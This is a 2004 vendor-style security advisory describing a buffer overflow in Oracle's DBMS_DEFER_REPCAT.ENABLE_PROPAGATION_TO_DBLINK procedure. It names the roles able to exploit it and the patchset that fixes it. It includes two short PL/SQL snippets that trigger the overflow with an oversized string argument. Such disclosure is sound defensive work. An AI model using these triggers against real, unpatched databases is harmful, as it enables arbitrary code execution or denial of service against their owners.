|
#32 - Buffer overflow in procedure ENABLE_PROPAGATION_TO_DBLINK of DBMS_DEFER_REPCAT package
August 31, 2004
Credit: These vulnerabilities were researched and discovered by Esteban Martínez Fayó of Application Security, Inc.
Risk level: Medium
Details:
When ENABLE_PROPAGATION_TO_DBLINK procedure is called with a long string as the parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
DECLARE
RET_VALUE_X123 BOOLEAN;
BEGIN
RET_VALUE_X123 := SYS.DBMS_DEFER_REPCAT.ENABLE_PROPAGATION_TO_DBLINK('longstring');
END;
or
DECLARE a BOOLEAN; -- return value
BEGIN
a := SYS.DBMS_DEFER_REPCAT.ENABLE_PROPAGATION_TO_DBLINK (DBLINK => 'longstring', NORMAL_ONLY => FALSE, INTERNAL_SET => FALSE);
END;
Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or SYSDBA role and users granted execute permissions on DBMS_DEFER_REPCAT package.
Exploitation of this vulnerability allows an attacker to execute arbitrary code. It can also be exploited to cause DOS (Denial of service) killing Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
|
